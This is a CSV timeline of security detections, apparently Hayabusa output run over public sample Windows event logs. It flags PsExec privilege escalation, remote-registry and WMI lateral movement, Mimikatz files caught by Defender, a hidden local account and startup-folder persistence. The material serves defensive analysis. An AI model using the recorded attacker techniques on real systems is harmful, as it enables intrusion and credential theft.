2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx
2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
